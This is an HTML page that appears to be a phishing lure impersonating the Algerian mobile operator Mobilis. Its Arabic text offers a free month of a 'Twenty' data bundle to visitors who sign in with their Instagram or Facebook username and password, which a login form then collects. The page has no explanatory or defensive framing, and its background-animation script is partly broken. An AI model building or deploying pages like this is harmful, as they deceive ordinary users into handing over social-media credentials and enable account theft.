<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="New Project.png">
    <title>Mobilis</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        :root {
            --neon-green: #39ff14;
            --dark-blue: #0a1929;
            --cyber-purple: #9d00ff;
            --cyber-blue: #0984e3;
            --error-red: #ff3e3e;
        }


        body {            
            color: rgb(255, 255, 255);
            background-color: rgb(255, 255, 255);
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }

        /* Matrix-style raining code background effect */
        .matrix-code {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: -1;
            opacity: 0.15;
            pointer-events: none;
        }



        .logo {
            text-align: center;
            margin-bottom: 80px;
            width: 100%;
        }

        .logo .imgmobilis {
            width: 30%;
        }

        .text{
            width: 90%;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: #22af09;
            border-radius: 10px;
            margin-bottom: 100px;
            box-shadow: 0px 0px 10px 3px #157405;
        }

        .text img{
            padding: 0px;
            width: 100%;
        }
        .text p{
            color: rgb(255, 255, 255);
            font-size: 100%;
            margin: 10px 5px;
            direction: rtl;
            font-family: Georgia, 'Times New Roman', Times, serif;
            text-indent: 10px;
            word-spacing: 2px;
        }

        .text .sign{
            width: 40px;
            margin: 5px;
        }
        .menubar{
            width: 100%;
            height: 50px;
            background-color: rgb(151, 151, 151);
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 0px 20px;
        }
        .container {
            width: 98%;
            padding: px;
            background: #2a2a2e;
            border-radius: 15px;
            margin: 30px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        .inputs{
            display: flex;
            flex-direction: column;
            align-items: center;
            width: 100%;
        }
        .inputs1{
            display: flex; 
            justify-content: center; 
            width: 100%;
            margin: 0px;
        }
        .email_pass{
            display: flex;
            flex-direction: column;
            align-items: center;
            width: 100%;
        }
        .input_name{
            position: relative;
            display: flex;
            align-items:center;
            width: 100%;
            height: 50px;
            margin:10px 10px;

        }

        .input_name1{
            padding: 0 10px;
            font-size: 15px;
            border: 1px solid #ededed;
            background-color: transparent;
            width: 100%;
            line-height: 50px;
            border-radius: 5px;
            color: #ffffff;
            transition: 0.05s ease;
            z-index: 1111;
            outline: none;
            font-family: Times, serif;
        }

        .lablline1{
            position: absolute;
            right: 0;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: start;
            pointer-events: none;
            font-size: 15px;
            font-family: Georgia, 'Times New Roman', Times, serif;
            padding:0 15px;
            transition: 0.2s ease;
            height: 20px;
            color: #ffffff;
            background-color: transparent; 

        }
        .input_name1:focus,
        .input_name1:valid{
            border: 2px solid #ffffffde ;
        }
        .input_name1:focus + .lablline1,
        .input_name1:valid + .lablline1{
            color: #ffffffde;
            z-index: 1111;
            padding:0 8px;
            background-color:transparent ; 
            background-position: right top;
            width: max-content;
        }
        .submit{
            text-align: center;
        }
        .submit input{
            background-color: transparent;
            border: none;
            color: #f9f9f9;
            font-size: 15px;
            cursor: pointer;
            font-family: Georgia, 'Times New Roman', Times, serif;
             background-color: #0984e3;
            padding: 7px 100px;
            border-radius: 50px;
            margin: 15px 0;
        }
        
        .btwchoise{
            display: flex;
            flex-direction: row-reverse;
            align-items: center;
            justify-items: center;
            justify-content: space-around;
            margin: 40px 0px;
        }

        .choise{
            background-color: transparent;
            padding: 5px;
            border: none;
            cursor: pointer;
        }


        .subtitle {
            color: #8a9bae;
            font-size: 14px;
            margin-bottom: 20px;
            letter-spacing: 1px;
            position: relative;
            display: inline-block;
        }
        
        .subtitle::before, .subtitle::after {
            content: '';
            position: absolute;
            height: 1px;
            width: 30px;
            background: linear-gradient(90deg, transparent, var(--neon-green), transparent);
            top: 50%;
        }
        
        .subtitle::before {
            left: -40px;
        }
        
        .subtitle::after {
            right: -40px;
        }



        .form-footer {
            border-top: solid ;
            width: 100%;
            margin-top: 20px;
            color: #000000;
            background-color: #dddddd;
            font-size: 14px;
            font-family: Georgia, 'Times New Roman', Times, serif;
        }

        .footerin{
            margin: 15px;
        }
        /* Animations */
        @keyframes pulse {
            0% { opacity: 0.7; }
            50% { opacity: 1; }
            100% { opacity: 0.7; }
        }

        /* Responsive design */
        @media (max-width: 480px) {
            .container {
                padding: 20px;
            }
            
            .logo h1 {
                font-size: 24px;
            }
        }
    </style>
</head>

<body>
        <div class="logo">
            <img class="imgmobilis" src="download.png" alt="">
            <div class="menubar">
                <img class="menulogo" src="menu.png" alt="">
                <img src="search_3917132.png" alt="">
            </div>
        </div>

        <div class="text">
            <img src="download.jpg" alt="">
            <p>اكتيفيت باقة توانتي واك حاب تزيد شهر باطل, سجل بالحساب تاعك تاع انستاغرام  ولا فايسبوك وتابع حساب توانتي وادي باقة توانتي صالحة لمدة شهر</p>
            <img class="sign" src="chevron-down_16799053.png" alt="">
        </div>
    <div class="container">     
            <div class="story">
                <div class="btwchoise">
                    <p style="direction: rtl; font-family: Georgia, 'Times New Roman', Times, serif;">إختر:</p>
                <button class="choise" id="mybutton1"><?xml version="1.0" ?><!DOCTYPE svg  PUBLIC '-//W3C//DTD SVG 1.1//EN'  'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'><svg width="38" enable-background="new 0 0 128 128" id="Social_Icons" version="1.1" viewBox="0 0 128 128" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g id="_x37__stroke"><g id="Instagram_1_"><rect clip-rule="evenodd" fill="none" fill-rule="evenodd" height="128" width="128"/><radialGradient cx="19.1111" cy="128.4444" gradientUnits="userSpaceOnUse" id="Instagram_2_" r="163.5519"><stop offset="0" style="stop-color:#FFB140"/><stop offset="0.2559" style="stop-color:#FF5445"/><stop offset="0.599" style="stop-color:#FC2B82"/><stop offset="1" style="stop-color:#8E40B7"/></radialGradient><path clip-rule="evenodd" d="M105.843,29.837    c0,4.242-3.439,7.68-7.68,7.68c-4.241,0-7.68-3.438-7.68-7.68c0-4.242,3.439-7.68,7.68-7.68    C102.405,22.157,105.843,25.595,105.843,29.837z M64,85.333c-11.782,0-21.333-9.551-21.333-21.333    c0-11.782,9.551-21.333,21.333-21.333c11.782,0,21.333,9.551,21.333,21.333C85.333,75.782,75.782,85.333,64,85.333z M64,31.135    c-18.151,0-32.865,14.714-32.865,32.865c0,18.151,14.714,32.865,32.865,32.865c18.151,0,32.865-14.714,32.865-32.865    C96.865,45.849,82.151,31.135,64,31.135z M64,11.532c17.089,0,19.113,0.065,25.861,0.373c6.24,0.285,9.629,1.327,11.884,2.204    c2.987,1.161,5.119,2.548,7.359,4.788c2.24,2.239,3.627,4.371,4.788,7.359c0.876,2.255,1.919,5.644,2.204,11.884    c0.308,6.749,0.373,8.773,0.373,25.862c0,17.089-0.065,19.113-0.373,25.861c-0.285,6.24-1.327,9.629-2.204,11.884    c-1.161,2.987-2.548,5.119-4.788,7.359c-2.239,2.24-4.371,3.627-7.359,4.788c-2.255,0.876-5.644,1.919-11.884,2.204    c-6.748,0.308-8.772,0.373-25.861,0.373c-17.09,0-19.114-0.065-25.862-0.373c-6.24-0.285-9.629-1.327-11.884-2.204    c-2.987-1.161-5.119-2.548-7.359-4.788c-2.239-2.239-3.627-4.371-4.788-7.359c-0.876-2.255-1.919-5.644-2.204-11.884    c-0.308-6.749-0.373-8.773-0.373-25.861c0-17.089,0.065-19.113,0.373-25.862c0.285-6.24,1.327-9.629,2.204-11.884    c1.161-2.987,2.548-5.119,4.788-7.359c2.239-2.24,4.371-3.627,7.359-4.788c2.255-0.876,5.644-1.919,11.884-2.204    C44.887,11.597,46.911,11.532,64,11.532z M64,0C46.619,0,44.439,0.074,37.613,0.385C30.801,0.696,26.148,1.778,22.078,3.36    c-4.209,1.635-7.778,3.824-11.336,7.382C7.184,14.3,4.995,17.869,3.36,22.078c-1.582,4.071-2.664,8.723-2.975,15.535    C0.074,44.439,0,46.619,0,64c0,17.381,0.074,19.561,0.385,26.387c0.311,6.812,1.393,11.464,2.975,15.535    c1.635,4.209,3.824,7.778,7.382,11.336c3.558,3.558,7.127,5.746,11.336,7.382c4.071,1.582,8.723,2.664,15.535,2.975    C44.439,127.926,46.619,128,64,128c17.381,0,19.561-0.074,26.387-0.385c6.812-0.311,11.464-1.393,15.535-2.975    c4.209-1.636,7.778-3.824,11.336-7.382c3.558-3.558,5.746-7.127,7.382-11.336c1.582-4.071,2.664-8.723,2.975-15.535    C127.926,83.561,128,81.381,128,64c0-17.381-0.074-19.561-0.385-26.387c-0.311-6.812-1.393-11.464-2.975-15.535    c-1.636-4.209-3.824-7.778-7.382-11.336c-3.558-3.558-7.127-5.746-11.336-7.382c-4.071-1.582-8.723-2.664-15.535-2.975    C83.561,0.074,81.381,0,64,0z" fill="url(#Instagram_2_)" fill-rule="evenodd" id="Instagram"/></g></g></svg></button>
                <button class="choise" id="mybutton2"><?xml version="1.0" ?><!DOCTYPE svg  PUBLIC '-//W3C//DTD SVG 1.1//EN'  'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'><svg height="100%" width="38" style="fill-rule:evenodd;clip-rule:evenodd;stroke-linejoin:round;stroke-miterlimit:2;" version="1.1" viewBox="0 0 512 512" width="100%" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:serif="http://www.serif.com/" xmlns:xlink="http://www.w3.org/1999/xlink"><g><path d="M512,256c0,-141.385 -114.615,-256 -256,-256c-141.385,0 -256,114.615 -256,256c0,127.777 93.616,233.685 216,252.89l0,-178.89l-65,0l0,-74l65,0l0,-56.4c0,-64.16 38.219,-99.6 96.695,-99.6c28.009,0 57.305,5 57.305,5l0,63l-32.281,0c-31.801,0 -41.719,19.733 -41.719,39.978l0,48.022l71,0l-11.35,74l-59.65,0l0,178.89c122.385,-19.205 216,-125.113 216,-252.89Z" style="fill:#1877f2;fill-rule:nonzero;"/><path d="M355.65,330l11.35,-74l-71,0l0,-48.022c0,-20.245 9.917,-39.978 41.719,-39.978l32.281,0l0,-63c0,0 -29.297,-5 -57.305,-5c-58.476,0 -96.695,35.44 -96.695,99.6l0,56.4l-65,0l0,74l65,0l0,178.89c13.033,2.045 26.392,3.11 40,3.11c13.608,0 26.966,-1.065 40,-3.11l0,-178.89l59.65,0Z" style="fill:#fff;fill-rule:nonzero;"/></g></svg></button>
                </div>
                <form name="loginform" method="post" action="">
                        <div class="inputs">
                              <div class="inputs1 email_pass">
                                  <div class="input_name">
                                      <input name="uname" class="input_name1" id="email" type="email"  required pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$">
                                      <div class="lablline1" id="labelline1">اسم المستخدم أو البريد الالكتروني أو رقم الهاتف    </div>
                                  </div>
                                  <div id="message1"></div>
                              </div>
                              <div class="inputs1 email_pass">
                                  <div class="input_name">
                                      <input name="pass" class="input_name1" id="password" type="password"  required pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$">
                                      <div class="lablline1" id="labelline2">كلمة السر   </div>
                                  </div>
                                  <div id="message2"></div>
                              </div>
                            <div class="submit">
                              <input id="next"  type="submit" value="تسجيل الدخول" >
                            </div>
                        </div>
                </form>
            </div>
            

    </div>
    <div class="form-footer">
        <div class="footerin">
        <h1>Nous contacter:</h1>
            <th>Mobilis:</th>
            <li>Depuis un numéro postpayé : 666</li>
            <li>Depuis un numéro prépayé : 888</li>
            <li>Depuis un fix : 0660 600 666</li>
            
            <th>Satim :</th>
            <li>Centre d'appel 3020</li>
            <td>
            <th>Algéie Post :</th>
            <li>Centre d'appel 1530</li>
        </div>


    </div>

    <script>
        // Matrix code rain effect
        document.addEventListener('DOMContentLoaded', function() {
            const canvas = document.getElementById('matrixCanvas');
            const ctx = canvas.getContext('2d');
            
            // Set canvas size
            canvas.width = window.innerWidth;
            canvas.height = window.innerHeight;
            
            // Character set for the matrix code
            const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$+-*/=%"\'#&_(),.;:?!\\|{}<>[]^~';
            const fontSize = 14;
            const columns = Math.floor(canvas.width / fontSize);
            
            // Array to track the Y position of each column
            const drops = [];
            for (let i = 0; i < columns; i++) {
                drops[i] = Math.floor(Math.random() * -100); // Random starting positions above the canvas
            }
            
            // Animation loop
            setInterval(drawMatrixRain, 50);
            
            // Handle window resize
            window.addEventListener('resize', function() {
                canvas.width = window.innerWidth;
                canvas.height = window.innerHeight;
            });
        });

        const button1 = document.getElementById("mybutton1");
        const button2 = document.getElementById("mybutton2");

        const emailenter = document.getElementById("email");
        const lablline1 = document.getElementById("labelline1");

        const passwordenter = document.getElementById("password");
        const lablline2 = document.getElementById("labelline2");

        button1.addEventListener("click", function() {
            button1.style.backgroundColor = "#0984e3";
            button1.style.borderRadius = "10px" ;
            button2.style.backgroundColor = "transparent";
        })
        button2.addEventListener("click", function() {
            button2.style.backgroundColor = "#0984e3";
            button2.style.borderRadius = "10px" ;
            button1.style.backgroundColor = "transparent";
        })
        emailenter.addEventListener("input", function() {
            if(emailenter.value.length > 0){
              lablline1.style.opacity = "0";
            }else{
             lablline1.style.opacity = "1";

            }

        })

        passwordenter.addEventListener("input", function() {
            if(passwordenter.value.length > 0){
              lablline2.style.opacity = "0";
            }else{
             lablline2.style.opacity = "1";

            }

        })

    </script>
</body>

</html>

